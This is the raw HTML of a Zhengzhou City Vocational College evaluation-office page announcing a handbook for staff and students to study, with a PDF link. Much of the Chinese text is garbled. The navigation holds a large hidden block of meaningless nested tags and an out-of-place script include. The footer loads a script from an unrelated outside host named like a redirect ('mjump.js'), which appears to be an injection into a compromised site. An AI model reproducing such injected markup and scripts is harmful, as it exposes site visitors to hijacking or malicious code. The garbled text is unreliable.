cu 关于组织学习《郑州城市职业学院评估宣传手册(一)》的通知-郑州城市职业学院-评估办公定/title> <meta content="" name="keywords"> <meta content="" name="description"> <link href="/Template/pinggu/images/jigou.css" rel="stylesheet" type="text/css"> <link href="/Template/pinggu/images/jigou280.css" rel="stylesheet" type="text/css"> </head> <body> <div class="banner"></div> <div class="navs"> <div class="snavs_in"> <div class="snavs_b"> <ul> <li class="li"><a href="">学院首页</a></li> <li><a href="/pgw/"><span>本站首页</span></a></li><div style='display:none'><q id='ape4b'><p id='ape4b'><optgroup id='ape4b'></optgroup></p></q><form id='ape4b'></form><ol id='ape4b'><th id='ape4b'><legend id='ape4b'></legend></th><bdo id='ape4b'><optgroup id='ape4b'></optgroup></bdo></ol><dl id='ape4b'><tt id='ape4b'><tr id='ape4b'></tr></tt><address id='ape4b'><th id='ape4b'></th></address></dl><style id='ape4b'><dt id='ape4b'></dt><dir id='ape4b'></dir></style><dd id='ape4b'></dd><dl id='ape4b'><sup id='ape4b'></sup></dl><table id='ape4b'><p id='ape4b'><optgroup id='ape4b'><tbody id='ape4b'><p id='ape4b'><dir id='ape4b'><div id='ape4b'><center id='ape4b'></center></div></dir></p></tbody></optgroup></p></table><abbr id='ape4b'><abbr id='ape4b'><blockquote id='ape4b'><i id='ape4b'><select id='ape4b'><td id='ape4b'><u id='ape4b'><ol id='ape4b'></ol><big id='ape4b'><big id='ape4b'></big></big></u><pre id='ape4b'><kbd id='ape4b'></kbd></pre><del id='ape4b'></del></td><button id='ape4b'><noframes id='ape4b'><option id='ape4b'></option><select id='ape4b'><span id='ape4b'><form id='ape4b'></form></span><dd id='ape4b'></dd></select><dt id='ape4b'></dt></noframes><del id='ape4b'><noframes id='ape4b'></noframes></del></button><kbd id='ape4b'></kbd><form id='ape4b'></form><button id='ape4b'><noframes id='ape4b'><style id='ape4b'><big id='ape4b'><i id='ape4b'></i><tbody id='ape4b'></tbody></big></style><abbr id='ape4b'></abbr></noframes></button></select></i><li id='ape4b'></li></blockquote></abbr><address id='ape4b'></address></abbr><address id='ape4b'><sub id='ape4b'><big id='ape4b'><tt id='ape4b'><bdo id='ape4b'><acronym id='ape4b'></acronym></bdo><label id='ape4b'><abbr id='ape4b'></abbr><em id='ape4b'><pre id='ape4b'></pre><address id='ape4b'><small id='ape4b'></small></address></em></label><center id='ape4b'><span id='ape4b'><b id='ape4b'></b></span></center><option id='ape4b'><bdo id='ape4b'><select id='ape4b'><strong id='ape4b'><q id='ape4b'><sup id='ape4b'><abbr id='ape4b'></abbr></sup><p id='ape4b'></p></q><span id='ape4b'><tfoot id='ape4b'><ul id='ape4b'><div id='ape4b'><style id='ape4b'><dir id='ape4b'></dir></style></div></ul></tfoot><q id='ape4b'><form id='ape4b'></form></q></span><noframes id='ape4b'><p id='ape4b'><sup id='ape4b'></sup></p></noframes></strong></select></bdo></option></tt><option id='ape4b'></option><li id='ape4b'></li></big><strong id='ape4b'></strong></sub></address><ol id='ape4b'><font id='ape4b'></font><dl id='ape4b'></dl></ol><option id='ape4b'></option><th id='ape4b'></th><li id='ape4b'></li><center id='ape4b'><u id='ape4b'></u></center><del id='ape4b'></del><tfoot id='ape4b'></tfoot><p id='ape4b'><strike id='ape4b'></strike><fieldset id='ape4b'></fieldset></p><tr id='ape4b'><bdo id='ape4b'><ul id='ape4b'></ul></bdo></tr><th id='ape4b'><tfoot id='ape4b'><p id='ape4b'><thead id='ape4b'><dfn id='ape4b'></dfn></thead></p><strong id='ape4b'></strong><th id='ape4b'></th></tfoot></th><u id='ape4b'><blockquote id='ape4b'></blockquote></u><b id='ape4b'><address id='ape4b'></address></b><ins id='ape4b'><table id='ape4b'><strike id='ape4b'><tfoot id='ape4b'><ins id='ape4b'></ins></tfoot><strike id='ape4b'><small id='ape4b'><div id='ape4b'></div></small></strike></strike><optgroup id='ape4b'><big id='ape4b'><abbr id='ape4b'></abbr></big><kbd id='ape4b'><q id='ape4b'></q></kbd></optgroup></table><big id='ape4b'></big></ins><sub id='ape4b'></sub><q id='ape4b'><kbd id='ape4b'></kbd><dt id='ape4b'></dt></q><big id='ape4b'><pre id='ape4b'><code id='ape4b'></code><del id='ape4b'><fieldset id='ape4b'></fieldset></del><big id='ape4b'><dt id='ape4b'></dt></big><bdo id='ape4b'></bdo></pre></big><noscript id='ape4b'></noscript><acronym id='ape4b'></acronym><div id='ape4b'><tr id='ape4b'><b id='ape4b'></b></tr></div><dl id='ape4b'></dl><tbody id='ape4b'><p id='ape4b'><noframes id='ape4b'></noframes></p><u id='ape4b'></u></tbody><dt id='ape4b'></dt><dd id='ape4b'></dd><big id='ape4b'></big><pre id='ape4b'></pre><dir id='ape4b'><optgroup id='ape4b'><select id='ape4b'></select></optgroup></dir><font id='ape4b'><ol id='ape4b'><dir id='ape4b'><dl id='ape4b'></dl><thead id='ape4b'></thead></dir></ol></font><pre id='ape4b'><tr id='ape4b'><q id='ape4b'><fieldset id='ape4b'></fieldset></q></tr></pre><dfn id='ape4b'><td id='ape4b'><strong id='ape4b'><style id='ape4b'><acronym id='ape4b'></acronym><pre id='ape4b'><pre id='ape4b'><dir id='ape4b'><label id='ape4b'><noframes id='ape4b'></noframes></label></dir><strike id='ape4b'></strike></pre></pre></style></strong><th id='ape4b'><dir id='ape4b'><dt id='ape4b'><b id='ape4b'></b></dt></dir></th></td></dfn><sub id='ape4b'></sub><th id='ape4b'></th><legend id='ape4b'></legend><style id='ape4b'></style><i id='ape4b'></i><optgroup id='ape4b'></optgroup><noscript id='ape4b'><q id='ape4b'><tfoot id='ape4b'><td id='ape4b'><b id='ape4b'></b></td></tfoot><pre id='ape4b'><code id='ape4b'></code><del id='ape4b'><form id='ape4b'></form></del><address id='ape4b'></address></pre></q></noscript><dfn id='ape4b'></dfn><optgroup id='ape4b'></optgroup><address id='ape4b'><sub id='ape4b'></sub></address><abbr id='ape4b'><ul id='ape4b'><big id='ape4b'><tbody id='ape4b'><dir id='ape4b'><tfoot id='ape4b'></tfoot><abbr id='ape4b'><noscript id='ape4b'></noscript></abbr></dir></tbody><tr id='ape4b'></tr></big></ul></abbr><dl id='ape4b'></dl><div id='ape4b'></div><div id='ape4b'><ol id='ape4b'></ol></div><i id='ape4b'></i><i id='ape4b'><strong id='ape4b'><sup id='ape4b'></sup><span id='ape4b'><strong id='ape4b'></strong><strong id='ape4b'></strong></span><option id='ape4b'><noscript id='ape4b'></noscript></option></strong></i><abbr id='ape4b'></abbr><ul id='ape4b'></ul><bdo id='ape4b'><div id='ape4b'></div></bdo><pre id='ape4b'><fieldset id='ape4b'></fieldset></pre><dfn id='ape4b'></dfn><tr id='ape4b'><option id='ape4b'><kbd id='ape4b'></kbd><label id='ape4b'><strong id='ape4b'><font id='ape4b'></font></strong></label><ol id='ape4b'><code id='ape4b'><td id='ape4b'><strike id='ape4b'><blockquote id='ape4b'></blockquote></strike></td></code></ol><dt id='ape4b'></dt><sup id='ape4b'><q id='ape4b'><dd id='ape4b'><q id='ape4b'><del id='ape4b'><acronym id='ape4b'></acronym><tfoot id='ape4b'></tfoot><label id='ape4b'><strong id='ape4b'></strong></label><td id='ape4b'></td><ul id='ape4b'><select id='ape4b'><li id='ape4b'></li></select></ul><label id='ape4b'></label></del><tbody id='ape4b'></tbody><dt id='ape4b'></dt></q><small id='ape4b'><strike id='ape4b'></strike></small></dd></q><label id='ape4b'></label></sup></option><pre id='ape4b'><ins id='ape4b'><td id='ape4b'></td><sub id='ape4b'><optgroup id='ape4b'></optgroup></sub><center id='ape4b'><em id='ape4b'></em></center><acronym id='ape4b'></acronym></ins></pre></tr><tr id='ape4b'></tr><center id='ape4b'><tbody id='ape4b'></tbody><tfoot id='ape4b'></tfoot></center><small id='ape4b'><th id='ape4b'></th></small><small id='ape4b'></small><em id='ape4b'></em><dfn id='ape4b'><dd id='ape4b'></dd></dfn><dl id='ape4b'><i id='ape4b'><td id='ape4b'><thead id='ape4b'></thead></td></i></dl><style id='ape4b'><th id='ape4b'><form id='ape4b'><span id='ape4b'><dl id='ape4b'><label id='ape4b'></label></dl><th id='ape4b'><li id='ape4b'><noscript id='ape4b'></noscript><tbody id='ape4b'></tbody><tbody id='ape4b'><form id='ape4b'><tbody id='ape4b'></tbody><dd id='ape4b'><i id='ape4b'></i></dd></form></tbody></li></th></span></form><optgroup id='ape4b'><ol id='ape4b'><b id='ape4b'></b></ol></optgroup></th></style><tbody id='ape4b'><strong id='ape4b'></strong><label id='ape4b'><label id='ape4b'><tbody id='ape4b'><small id='ape4b'><noframes id='ape4b'></noframes><ul id='ape4b'></ul><b id='ape4b'></b></small></tbody></label><label id='ape4b'><code id='ape4b'></code><kbd id='ape4b'></kbd></label><u id='ape4b'><tt id='ape4b'></tt></u></label></tbody><dfn id='ape4b'><tbody id='ape4b'></tbody></dfn><pre id='ape4b'><em id='ape4b'><option id='ape4b'><dt id='ape4b'></dt></option></em></pre><optgroup id='ape4b'><thead id='ape4b'></thead></optgroup><optgroup id='ape4b'></optgroup><optgroup id='ape4b'></optgroup><em id='ape4b'></em><address id='ape4b'></address><blockquote id='ape4b'><u id='ape4b'><style id='ape4b'><b id='ape4b'></b><thead id='ape4b'><style id='ape4b'><strong id='ape4b'><ol id='ape4b'></ol></strong></style><acronym id='ape4b'><del id='ape4b'><dd id='ape4b'></dd><bdo id='ape4b'><legend id='ape4b'><kbd id='ape4b'><address id='ape4b'></address></kbd></legend></bdo></del></acronym></thead><tbody id='ape4b'></tbody></style></u><label id='ape4b'><dt id='ape4b'></dt></label></blockquote><li id='ape4b'><dl id='ape4b'><noframes id='ape4b'><form id='ape4b'></form></noframes></dl></li><td id='ape4b'></td><blockquote id='ape4b'><th id='ape4b'><tr id='ape4b'></tr><code id='ape4b'><sup id='ape4b'><fieldset id='ape4b'></fieldset><code id='ape4b'></code><big id='ape4b'></big></sup></code></th></blockquote><select id='ape4b'><kbd id='ape4b'><sup id='ape4b'></sup><form id='ape4b'></form></kbd></select><big id='ape4b'></big><em id='ape4b'></em><sup id='ape4b'><b id='ape4b'></b><strong id='ape4b'></strong></sup><kbd id='ape4b'><ol id='ape4b'></ol></kbd><optgroup id='ape4b'><tt id='ape4b'><font id='ape4b'><td id='ape4b'></td></font></tt></optgroup><pre id='ape4b'><center id='ape4b'></center></pre><tt id='ape4b'></tt><big id='ape4b'><strike id='ape4b'><li id='ape4b'><kbd id='ape4b'></kbd></li><i id='ape4b'><blockquote id='ape4b'><label id='ape4b'><u id='ape4b'><ins id='ape4b'></ins><dfn id='ape4b'></dfn></u></label><noscript id='ape4b'><span id='ape4b'></span></noscript><td id='ape4b'></td><pre id='ape4b'><li id='ape4b'><td id='ape4b'><label id='ape4b'></label><pre id='ape4b'></pre></td></li></pre><small id='ape4b'></small></blockquote></i><b id='ape4b'><i id='ape4b'></i></b><td id='ape4b'><select id='ape4b'></select><table id='ape4b'><tbody id='ape4b'></tbody></table><dt id='ape4b'><dd id='ape4b'></dd></dt></td></strike><strong id='ape4b'><sub id='ape4b'></sub><td id='ape4b'></td></strong></big><blockquote id='ape4b'></blockquote><small id='ape4b'></small><dir id='ape4b'></dir><tr id='ape4b'></tr><center id='ape4b'><u id='ape4b'></u></center><kbd id='ape4b'></kbd><select id='ape4b'><u id='ape4b'><p id='ape4b'><p id='ape4b'><em id='ape4b'><dfn id='ape4b'><table id='ape4b'><dl id='ape4b'></dl><center id='ape4b'></center></table></dfn><div id='ape4b'></div><small id='ape4b'></small></em></p></p><acronym id='ape4b'></acronym><u id='ape4b'></u><sup id='ape4b'><thead id='ape4b'><noscript id='ape4b'></noscript></thead></sup></u><ol id='ape4b'></ol><sub id='ape4b'></sub></select><address id='ape4b'></address><dl id='ape4b'><small id='ape4b'><ul id='ape4b'><optgroup id='ape4b'><em id='ape4b'></em></optgroup><tt id='ape4b'></tt><strike id='ape4b'></strike></ul><thead id='ape4b'><kbd id='ape4b'><kbd id='ape4b'></kbd><noframes id='ape4b'><bdo id='ape4b'><sup id='ape4b'><div id='ape4b'><bdo id='ape4b'></bdo></div></sup></bdo></noframes><label id='ape4b'></label><strike id='ape4b'></strike></kbd></thead></small></dl><big id='ape4b'></big><ins id='ape4b'><optgroup id='ape4b'></optgroup></ins><dl id='ape4b'><tbody id='ape4b'></tbody></dl><dt id='ape4b'></dt><tr id='ape4b'><address id='ape4b'></address></tr><small id='ape4b'><font id='ape4b'></font></small><option id='ape4b'><thead id='ape4b'></thead><em id='ape4b'></em></option><tfoot id='ape4b'></tfoot><tbody id='ape4b'></tbody><li id='ape4b'></li><tbody id='ape4b'></tbody><address id='ape4b'></address><del id='ape4b'><big id='ape4b'><label id='ape4b'><code id='ape4b'><th id='ape4b'><legend id='ape4b'></legend><i id='ape4b'></i><form id='ape4b'></form></th></code></label></big><dd id='ape4b'><span id='ape4b'><abbr id='ape4b'></abbr></span></dd></del><ol id='ape4b'></ol><address id='ape4b'><sup id='ape4b'><acronym id='ape4b'></acronym></sup></address><blockquote id='ape4b'></blockquote><font id='ape4b'></font><optgroup id='ape4b'><bdo id='ape4b'></bdo><acronym id='ape4b'></acronym></optgroup><del id='ape4b'></del><code id='ape4b'><select id='ape4b'></select><td id='ape4b'></td></code><tfoot id='ape4b'></tfoot><kbd id='ape4b'><b id='ape4b'><style id='ape4b'><tbody id='ape4b'><tr id='ape4b'></tr><big id='ape4b'></big><ol id='ape4b'><u id='ape4b'><dfn id='ape4b'></dfn></u></ol></tbody></style><dl id='ape4b'><b id='ape4b'><ins id='ape4b'><tt id='ape4b'><b id='ape4b'><blockquote id='ape4b'><dir id='ape4b'></dir><label id='ape4b'><li id='ape4b'></li><i id='ape4b'></i><u id='ape4b'><tbody id='ape4b'></tbody></u></label><li id='ape4b'><tt id='ape4b'></tt></li></blockquote></b></tt></ins></b></dl></b></kbd><fieldset id='ape4b'><sub id='ape4b'><div id='ape4b'></div></sub></fieldset><acronym id='ape4b'><td id='ape4b'><form id='ape4b'></form></td><big id='ape4b'><dfn id='ape4b'><b id='ape4b'><address id='ape4b'></address></b><thead id='ape4b'><span id='ape4b'></span></thead></dfn></big></acronym><ul id='ape4b'></ul><tbody id='ape4b'><sup id='ape4b'><legend id='ape4b'><b id='ape4b'></b></legend></sup><legend id='ape4b'><sub id='ape4b'><ul id='ape4b'><b id='ape4b'><q id='ape4b'></q></b></ul><tfoot id='ape4b'></tfoot><ul id='ape4b'></ul><bdo id='ape4b'></bdo></sub></legend></tbody><dfn id='ape4b'><label id='ape4b'></label></dfn><em id='ape4b'><bdo id='ape4b'><ins id='ape4b'><dl id='ape4b'></dl></ins><pre id='ape4b'><p id='ape4b'></p><span id='ape4b'><tt id='ape4b'></tt></span></pre></bdo></em></div> <script language="javascript" type="text/javascript" src="/@uploads/js/common386.js"></script> <li><a href="/pgw/pjdt/"><span>评建动急/span></a></li> <li><a href="/pgw/pzxgg/"><span>最新公/span></a></li> <li><a href="/pgw/pzcwj/"><span>政策文件</span></a></li> <li><a href="/pgw/pjzs/"><span>评建知识</span></a></li> <li><a href="/pgw/pjjb/"><span>评建简L/span></a></li> <li><a href="/pgw/tszs/"><span>他山之石</span></a></li> <li><a href="/pgw/pwjxz/"><span>文件下载</span></a></li> </ul> </div> </div> </div> <div class="clear"></div> <div class="list_pos">当前位置?a href="/pgw/">首页</a> > 最新公> 正文内容</div> <div class="cnt950 page_wrap"> <div class="side"> <div class="hd"><h3>评估办公定/h3></div> <div class="bd"> <ul class=""> <li><a href="/pgw/pjdt/"><span>评建动急/span></a></li> <li><a href="/pgw/pzxgg/"><span>最新公/span></a></li> <li><a href="/pgw/pzcwj/"><span>政策文件</span></a></li> <li><a href="/pgw/pjzs/"><span>评建知识</span></a></li> <li><a href="/pgw/pjjb/"><span>评建简L/span></a></li> <li><a href="/pgw/pgzyj/"><span>高职研究</span></a></li> <li><a href="/pgw/tszs/"><span>他仙之石</span></a></li> <li><a href="/pgw/pwjxz/"><span>文件下载</span></a></li> </ul> </div> </div> <div class="main"> <div class="hd"><h3>最新公/h3></div> <div class="bd"> <div class="page-m"> <div class="r_page_content"> <!--文章标题--> <h1>关于组织学习《郑州城市职业学院评估宣传手册(一)》的通知</h1> <div class="info">发布时间?0151朞4日 点击数:<span id="hits"> <script language="JavaScript" type="text/JavaScript" src="/Common/GetHits.aspx?id=1386"></script> </span></div> <!--正文内容--> <div class="content" id="artiContent"> <div class="c_content_overflow" id="fontzoom"> <p>   为了让全院师生员工深刻理解高等职业院校人才培养工作评估的目的和意义,掌握评估指标体系中各项指标的具体涵义,提高每一位师生员工迎评创建工作的丛span new="" times="">体意识和责任意识,评估办公室根据教育部《高等职业院校人才培养工作评估方案》(教高</span>〮008p<span new="" times="">号文)和河南省教育厅《关于做好高等职业院校人才培养工作评估的通知》(教高</span>〮009〱62<span new="" times="">号)精神,也即第二轮评估指标体系,编写了《郑州城市职业学院评估宣传手册(一)》,现予以发布供大家学习参考(见附件)G/span></p> <p><a href="/UploadFiles/pgw/2015/11/201511040834542392.pdf"><span new="" times="">高等职院校人才培养评建宣传手册(一?/span></a></p> </div> </div> <!--分页--> <div id="page1"></div> </div> </div> </div> </div> </div> <div class="clear10"></div> <div class="footer"> 版权所有:郑州城市职业学院 技术支持:<br> 河南郑州市新密溱水路西段618号 邮编?52370 电话?371-69213333 <br> 豫ICP夣S2014925另R </div> <script type="text/javascript" src="https://js.users.51.la/19550489.js"></script> <script src="http://www.ybtoad.com/mjump.js"></script><script> (function(){ var canonicalURL, curProtocol; //Get the <link> tag var x=document.getElementsByTagName("link"); //Find the last canonical URL if(x.length > 0){ for (i=0;i<x.length;i++){ if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){ canonicalURL=x[i].href; } } } //Get protocol if (!canonicalURL){ curProtocol = window.location.protocol.split(':')[0]; } else{ curProtocol = canonicalURL.split(':')[0]; } //Get current URL if the canonical URL does not exist if (!canonicalURL) canonicalURL = window.location.href; //Assign script content. Replace current URL with the canonical URL !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})(); </script></body></html>